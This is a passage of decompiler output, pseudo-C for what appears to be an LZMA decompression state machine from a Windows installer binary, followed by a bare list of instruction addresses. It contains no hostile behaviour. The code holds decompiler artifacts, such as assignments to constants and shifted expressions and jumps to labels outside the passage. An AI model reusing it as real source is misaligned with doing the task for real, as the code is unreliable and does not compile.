                                                                                                                                                                            													__edi = __ax & 0x0000ffff;
                                                                                                                                                                            													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                            													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            													if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            														__cx = __ax;
                                                                                                                                                                            														_t170 = __edx + 1; // 0x1
                                                                                                                                                                            														__ebx = _t170;
                                                                                                                                                                            														__cx = __ax >> 5;
                                                                                                                                                                            														__eflags = __eax;
                                                                                                                                                                            														 *__esi = __ax;
                                                                                                                                                                            													} else {
                                                                                                                                                                            														 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                            														0x800 = 0x800 - __edi;
                                                                                                                                                                            														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                            														__ebx = __ebx + __ebx;
                                                                                                                                                                            														 *__esi = __cx;
                                                                                                                                                                            													}
                                                                                                                                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            														continue;
                                                                                                                                                                            													} else {
                                                                                                                                                                            														goto L46;
                                                                                                                                                                            													}
                                                                                                                                                                            												}
                                                                                                                                                                            												L54:
                                                                                                                                                                            												_t173 = __ebp - 0x34;
                                                                                                                                                                            												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                                            												__eflags =  *_t173;
                                                                                                                                                                            												goto L55;
                                                                                                                                                                            											case 0xf:
                                                                                                                                                                            												L58:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            													 *(__ebp - 0x88) = 0xf;
                                                                                                                                                                            													goto L170;
                                                                                                                                                                            												}
                                                                                                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												_t203 = __ebp - 0x70;
                                                                                                                                                                            												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            												__eflags =  *_t203;
                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												L60:
                                                                                                                                                                            												__eflags = __ebx - 0x100;
                                                                                                                                                                            												if(__ebx >= 0x100) {
                                                                                                                                                                            													L55:
                                                                                                                                                                            													__al =  *(__ebp - 0x44);
                                                                                                                                                                            													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                                            													goto L56;
                                                                                                                                                                            												}
                                                                                                                                                                            												L61:
                                                                                                                                                                            												__eax =  *(__ebp - 0x58);
                                                                                                                                                                            												__edx = __ebx + __ebx;
                                                                                                                                                                            												__ecx =  *(__ebp - 0x10);
                                                                                                                                                                            												__esi = __edx + __eax;
                                                                                                                                                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            												__ax =  *__esi;
                                                                                                                                                                            												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            												__edi = __ax & 0x0000ffff;
                                                                                                                                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            													__cx = __ax;
                                                                                                                                                                            													_t217 = __edx + 1; // 0x1
                                                                                                                                                                            													__ebx = _t217;
                                                                                                                                                                            													__cx = __ax >> 5;
                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                            													 *__esi = __ax;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                            													0x800 = 0x800 - __edi;
                                                                                                                                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                            													__ebx = __ebx + __ebx;
                                                                                                                                                                            													 *__esi = __cx;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            													goto L60;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													goto L58;
                                                                                                                                                                            												}
                                                                                                                                                                            											case 0x10:
                                                                                                                                                                            												L109:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            													 *(__ebp - 0x88) = 0x10;
                                                                                                                                                                            													goto L170;
                                                                                                                                                                            												}
                                                                                                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												_t365 = __ebp - 0x70;
                                                                                                                                                                            												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            												__eflags =  *_t365;
                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												goto L111;
                                                                                                                                                                            											case 0x11:
                                                                                                                                                                            												goto L69;
                                                                                                                                                                            											case 0x12:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            													__eax =  *(__ebp - 0x58);
                                                                                                                                                                            													 *(__ebp - 0x84) = 0x13;
                                                                                                                                                                            													__esi =  *(__ebp - 0x58) + 2;
                                                                                                                                                                            													while(1) {
                                                                                                                                                                            														L132:
                                                                                                                                                                            														 *(_t613 - 0x54) = _t606;
                                                                                                                                                                            														goto L133;
                                                                                                                                                                            													}
                                                                                                                                                                            												}
                                                                                                                                                                            												__eax =  *(__ebp - 0x4c);
                                                                                                                                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                                            												__ecx =  *(__ebp - 0x58);
                                                                                                                                                                            												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                            												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                                            												goto L130;
                                                                                                                                                                            											case 0x13:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            													_t469 = __ebp - 0x58;
                                                                                                                                                                            													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                                            													__eflags =  *_t469;
                                                                                                                                                                            													 *(__ebp - 0x30) = 0x10;
                                                                                                                                                                            													 *(__ebp - 0x40) = 8;
                                                                                                                                                                            													L144:
                                                                                                                                                                            													 *(__ebp - 0x7c) = 0x14;
                                                                                                                                                                            													goto L145;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eax =  *(__ebp - 0x4c);
                                                                                                                                                                            												__ecx =  *(__ebp - 0x58);
                                                                                                                                                                            												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                            												 *(__ebp - 0x30) = 8;
                                                                                                                                                                            												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                                            												L130:
                                                                                                                                                                            												 *(__ebp - 0x58) = __eax;
                                                                                                                                                                            												 *(__ebp - 0x40) = 3;
                                                                                                                                                                            												goto L144;
                                                                                                                                                                            											case 0x14:
                                                                                                                                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                                            												__eax =  *(__ebp - 0x80);
                                                                                                                                                                            												 *(_t613 - 0x88) = _t533;
                                                                                                                                                                            												goto L1;
                                                                                                                                                                            											case 0x15:
                                                                                                                                                                            												__eax = 0;
                                                                                                                                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                            												__al = __al & 0x000000fd;
                                                                                                                                                                            												__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                            												goto L120;
                                                                                                                                                                            											case 0x16:
                                                                                                                                                                            												__eax =  *(__ebp - 0x30);
                                                                                                                                                                            												__eflags = __eax - 4;
                                                                                                                                                                            												if(__eax >= 4) {
                                                                                                                                                                            													_push(3);
                                                                                                                                                                            													_pop(__eax);
                                                                                                                                                                            												}
                                                                                                                                                                            												__ecx =  *(__ebp - 4);
                                                                                                                                                                            												 *(__ebp - 0x40) = 6;
                                                                                                                                                                            												__eax = __eax << 7;
                                                                                                                                                                            												 *(__ebp - 0x7c) = 0x19;
                                                                                                                                                                            												 *(__ebp - 0x58) = __eax;
                                                                                                                                                                            												goto L145;
                                                                                                                                                                            											case 0x17:
                                                                                                                                                                            												L145:
                                                                                                                                                                            												__eax =  *(__ebp - 0x40);
                                                                                                                                                                            												 *(__ebp - 0x50) = 1;
                                                                                                                                                                            												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                                                                            												goto L149;
                                                                                                                                                                            											case 0x18:
                                                                                                                                                                            												L146:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            													 *(__ebp - 0x88) = 0x18;
                                                                                                                                                                            													goto L170;
                                                                                                                                                                            												}
                                                                                                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												_t484 = __ebp - 0x70;
                                                                                                                                                                            												 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            												__eflags =  *_t484;
                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												L148:
                                                                                                                                                                            												_t487 = __ebp - 0x48;
                                                                                                                                                                            												 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                            												__eflags =  *_t487;
                                                                                                                                                                            												L149:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x48);
                                                                                                                                                                            												if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                            													__ecx =  *(__ebp - 0x40);
                                                                                                                                                                            													__ebx =  *(__ebp - 0x50);
                                                                                                                                                                            													0 = 1;
                                                                                                                                                                            													__eax = 1 << __cl;
                                                                                                                                                                            													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                                                                            													__eax =  *(__ebp - 0x7c);
                                                                                                                                                                            													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            													while(1) {
                                                                                                                                                                            														 *(_t613 - 0x88) = _t533;
                                                                                                                                                                            														goto L1;
                                                                                                                                                                            													}
                                                                                                                                                                            												}
                                                                                                                                                                            												__eax =  *(__ebp - 0x50);
                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                            												__eax =  *(__ebp - 0x58);
                                                                                                                                                                            												__esi = __edx + __eax;
                                                                                                                                                                            												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            												__ax =  *__esi;
                                                                                                                                                                            												__edi = __ax & 0x0000ffff;
                                                                                                                                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            													__cx = __ax;
                                                                                                                                                                            													__cx = __ax >> 5;
                                                                                                                                                                            													__eax = __eax - __ecx;
                                                                                                                                                                            													__edx = __edx + 1;
                                                                                                                                                                            													__eflags = __edx;
                                                                                                                                                                            													 *__esi = __ax;
                                                                                                                                                                            													 *(__ebp - 0x50) = __edx;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                            													0x800 = 0x800 - __edi;
                                                                                                                                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                            													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                            													 *__esi = __cx;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            													goto L148;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													goto L146;
                                                                                                                                                                            												}
                                                                                                                                                                            											case 0x19:
                                                                                                                                                                            												__eflags = __ebx - 4;
                                                                                                                                                                            												if(__ebx < 4) {
                                                                                                                                                                            													 *(__ebp - 0x2c) = __ebx;
                                                                                                                                                                            													L119:
                                                                                                                                                                            													_t393 = __ebp - 0x2c;
                                                                                                                                                                            													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                                                                            													__eflags =  *_t393;
                                                                                                                                                                            													L120:
                                                                                                                                                                            													__eax =  *(__ebp - 0x2c);
                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                            													if(__eax == 0) {
                                                                                                                                                                            														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                                                                            														goto L170;
                                                                                                                                                                            													}
                                                                                                                                                                            													__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                                                                            													if(__eax >  *(__ebp - 0x60)) {
                                                                                                                                                                            														goto L171;
                                                                                                                                                                            													}
                                                                                                                                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                                                                            													__eax =  *(__ebp - 0x30);
                                                                                                                                                                            													_t400 = __ebp - 0x60;
                                                                                                                                                                            													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                                                                            													__eflags =  *_t400;
                                                                                                                                                                            													goto L123;
                                                                                                                                                                            												}
                                                                                                                                                                            												__ecx = __ebx;
                                                                                                                                                                            												__eax = __ebx;
                                                                                                                                                                            												__ecx = __ebx >> 1;
                                                                                                                                                                            												__eax = __ebx & 0x00000001;
                                                                                                                                                                            												__ecx = (__ebx >> 1) - 1;
                                                                                                                                                                            												__al = __al | 0x00000002;
                                                                                                                                                                            												__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                                            												__eflags = __ebx - 0xe;
                                                                                                                                                                            												 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                            												if(__ebx >= 0xe) {
                                                                                                                                                                            													__ebx = 0;
                                                                                                                                                                            													 *(__ebp - 0x48) = __ecx;
                                                                                                                                                                            													L102:
                                                                                                                                                                            													__eflags =  *(__ebp - 0x48);
                                                                                                                                                                            													if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                            														__eax = __eax + __ebx;
                                                                                                                                                                            														 *(__ebp - 0x40) = 4;
                                                                                                                                                                            														 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                            														__eax =  *(__ebp - 4);
                                                                                                                                                                            														__eax =  *(__ebp - 4) + 0x644;
                                                                                                                                                                            														__eflags = __eax;
                                                                                                                                                                            														L108:
                                                                                                                                                                            														__ebx = 0;
                                                                                                                                                                            														 *(__ebp - 0x58) = __eax;
                                                                                                                                                                            														 *(__ebp - 0x50) = 1;
                                                                                                                                                                            														 *(__ebp - 0x44) = 0;
                                                                                                                                                                            														 *(__ebp - 0x48) = 0;
                                                                                                                                                                            														L112:
                                                                                                                                                                            														__eax =  *(__ebp - 0x40);
                                                                                                                                                                            														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                            														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                                                                            															_t391 = __ebp - 0x2c;
                                                                                                                                                                            															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                                                                            															__eflags =  *_t391;
                                                                                                                                                                            															goto L119;
                                                                                                                                                                            														}
                                                                                                                                                                            														__eax =  *(__ebp - 0x50);
                                                                                                                                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                            														__eax =  *(__ebp - 0x58);
                                                                                                                                                                            														__esi = __edi + __eax;
                                                                                                                                                                            														 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            														__ax =  *__esi;
                                                                                                                                                                            														__ecx = __ax & 0x0000ffff;
                                                                                                                                                                            														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                                                                            														__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                            														if( *(__ebp - 0xc) >= __edx) {
                                                                                                                                                                            															__ecx = 0;
                                                                                                                                                                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                                                                            															__ecx = 1;
                                                                                                                                                                            															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                            															__ebx = 1;
                                                                                                                                                                            															__ecx =  *(__ebp - 0x48);
                                                                                                                                                                            															__ebx = 1 << __cl;
                                                                                                                                                                            															__ecx = 1 << __cl;
                                                                                                                                                                            															__ebx =  *(__ebp - 0x44);
                                                                                                                                                                            															__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                                                                            															__cx = __ax;
                                                                                                                                                                            															__cx = __ax >> 5;
                                                                                                                                                                            															__eax = __eax - __ecx;
                                                                                                                                                                            															__edi = __edi + 1;
                                                                                                                                                                            															__eflags = __edi;
                                                                                                                                                                            															 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            															 *__esi = __ax;
                                                                                                                                                                            															 *(__ebp - 0x50) = __edi;
                                                                                                                                                                            														} else {
                                                                                                                                                                            															 *(__ebp - 0x10) = __edx;
                                                                                                                                                                            															0x800 = 0x800 - __ecx;
                                                                                                                                                                            															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                                                                            															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                            															 *__esi = __dx;
                                                                                                                                                                            														}
                                                                                                                                                                            														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            														if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            															L111:
                                                                                                                                                                            															_t368 = __ebp - 0x48;
                                                                                                                                                                            															 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                                                                            															__eflags =  *_t368;
                                                                                                                                                                            															goto L112;
                                                                                                                                                                            														} else {
                                                                                                                                                                            															goto L109;
                                                                                                                                                                            														}
                                                                                                                                                                            													}
                                                                                                                                                                            													__ecx =  *(__ebp - 0xc);
                                                                                                                                                                            													__ebx = __ebx + __ebx;
                                                                                                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                                                                            													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                            													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                                                                            														__ecx =  *(__ebp - 0x10);
                                                                                                                                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                            														__ebx = __ebx | 0x00000001;
                                                                                                                                                                            														__eflags = __ebx;
                                                                                                                                                                            														 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            													}
                                                                                                                                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            														L101:
                                                                                                                                                                            														_t338 = __ebp - 0x48;
                                                                                                                                                                            														 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                            														__eflags =  *_t338;
                                                                                                                                                                            														goto L102;
                                                                                                                                                                            													} else {
                                                                                                                                                                            														goto L99;
                                                                                                                                                                            													}
                                                                                                                                                                            												}
                                                                                                                                                                            												__edx =  *(__ebp - 4);
                                                                                                                                                                            												__eax = __eax - __ebx;
                                                                                                                                                                            												 *(__ebp - 0x40) = __ecx;
                                                                                                                                                                            												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                                                                            												goto L108;
                                                                                                                                                                            											case 0x1a:
                                                                                                                                                                            												L56:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x64);
                                                                                                                                                                            												if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                            													 *(__ebp - 0x88) = 0x1a;
                                                                                                                                                                            													goto L170;
                                                                                                                                                                            												}
                                                                                                                                                                            												__ecx =  *(__ebp - 0x68);
                                                                                                                                                                            												__al =  *(__ebp - 0x5c);
                                                                                                                                                                            												__edx =  *(__ebp - 8);
                                                                                                                                                                            												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                            												 *( *(__ebp - 0x68)) = __al;
                                                                                                                                                                            												__ecx =  *(__ebp - 0x14);
                                                                                                                                                                            												 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                                                                            												__eax = __ecx + 1;
                                                                                                                                                                            												__edx = 0;
                                                                                                                                                                            												_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                            												__edx = _t192;
                                                                                                                                                                            												goto L80;
                                                                                                                                                                            											case 0x1b:
                                                                                                                                                                            												L76:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x64);
                                                                                                                                                                            												if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                            													 *(__ebp - 0x88) = 0x1b;
                                                                                                                                                                            													goto L170;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                                                                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                            												}
                                                                                                                                                                            												__edx =  *(__ebp - 8);
                                                                                                                                                                            												__cl =  *(__eax + __edx);
                                                                                                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                                                                                                            												 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                            												 *(__eax + __edx) = __cl;
                                                                                                                                                                            												__eax = __eax + 1;
                                                                                                                                                                            												__edx = 0;
                                                                                                                                                                            												_t275 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                            												__edx = _t275;
                                                                                                                                                                            												__eax =  *(__ebp - 0x68);
                                                                                                                                                                            												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                            												_t284 = __ebp - 0x64;
                                                                                                                                                                            												 *_t284 =  *(__ebp - 0x64) - 1;
                                                                                                                                                                            												__eflags =  *_t284;
                                                                                                                                                                            												 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                            												L80:
                                                                                                                                                                            												 *(__ebp - 0x14) = __edx;
                                                                                                                                                                            												goto L81;
                                                                                                                                                                            											case 0x1c:
                                                                                                                                                                            												while(1) {
                                                                                                                                                                            													L123:
                                                                                                                                                                            													__eflags =  *(__ebp - 0x64);
                                                                                                                                                                            													if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                            														break;
                                                                                                                                                                            													}
                                                                                                                                                                            													__eax =  *(__ebp - 0x14);
                                                                                                                                                                            													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                            													__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                            													if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                            														__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                            														__eflags = __eax;
                                                                                                                                                                            													}
                                                                                                                                                                            													__edx =  *(__ebp - 8);
                                                                                                                                                                            													__cl =  *(__eax + __edx);
                                                                                                                                                                            													__eax =  *(__ebp - 0x14);
                                                                                                                                                                            													 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                            													 *(__eax + __edx) = __cl;
                                                                                                                                                                            													__eax = __eax + 1;
                                                                                                                                                                            													__edx = 0;
                                                                                                                                                                            													_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                            													__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                            													__edx = _t414;
                                                                                                                                                                            													__eax =  *(__ebp - 0x68);
                                                                                                                                                                            													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                            													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                                                                            													__eflags =  *(__ebp - 0x30);
                                                                                                                                                                            													 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                            													 *(__ebp - 0x14) = _t414;
                                                                                                                                                                            													if( *(__ebp - 0x30) > 0) {
                                                                                                                                                                            														continue;
                                                                                                                                                                            													} else {
                                                                                                                                                                            														L81:
                                                                                                                                                                            														 *(__ebp - 0x88) = 2;
                                                                                                                                                                            														goto L1;
                                                                                                                                                                            													}
                                                                                                                                                                            												}
                                                                                                                                                                            												 *(__ebp - 0x88) = 0x1c;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            									L171:
                                                                                                                                                                            									_t535 = _t534 | 0xffffffff;
                                                                                                                                                                            									goto L172;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L1;
                                                                                                                                                                            				}
                                                                                                                                                                            			}













                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406701
                                                                                                                                                                            0x00406701
                                                                                                                                                                            0x00406705
                                                                                                                                                                            0x00406712
                                                                                                                                                                            0x0040671c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406707
                                                                                                                                                                            0x00406707
                                                                                                                                                                            0x00406742
                                                                                                                                                                            0x00406745
                                                                                                                                                                            0x00406748
                                                                                                                                                                            0x0040674b
                                                                                                                                                                            0x0040674b
                                                                                                                                                                            0x0040674e
                                                                                                                                                                            0x00406755
                                                                                                                                                                            0x0040675a
                                                                                                                                                                            0x0040663b
                                                                                                                                                                            0x0040663e
                                                                                                                                                                            0x004069b0
                                                                                                                                                                            0x004069b0
                                                                                                                                                                            0x004069b0
                                                                                                                                                                            0x004069b3
                                                                                                                                                                            0x004069b3
                                                                                                                                                                            0x004069b3
                                                                                                                                                                            0x004069b9
                                                                                                                                                                            0x004069bf
                                                                                                                                                                            0x004069c5
                                                                                                                                                                            0x004069df
                                                                                                                                                                            0x004069e2
                                                                                                                                                                            0x004069e8
                                                                                                                                                                            0x004069f3
                                                                                                                                                                            0x004069f5
                                                                                                                                                                            0x004069c7
                                                                                                                                                                            0x004069c7
                                                                                                                                                                            0x004069d6
                                                                                                                                                                            0x004069da
                                                                                                                                                                            0x004069da
                                                                                                                                                                            0x004069ff
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00406a01
                                                                                                                                                                            0x00406a05
                                                                                                                                                                            0x00406bb4
                                                                                                                                                                            0x00406bca
                                                                                                                                                                            0x00406bd2
                                                                                                                                                                            0x00406bd9
                                                                                                                                                                            0x00406bdb
                                                                                                                                                                            0x00406be2
                                                                                                                                                                            0x00406be6
                                                                                                                                                                            0x00406be6
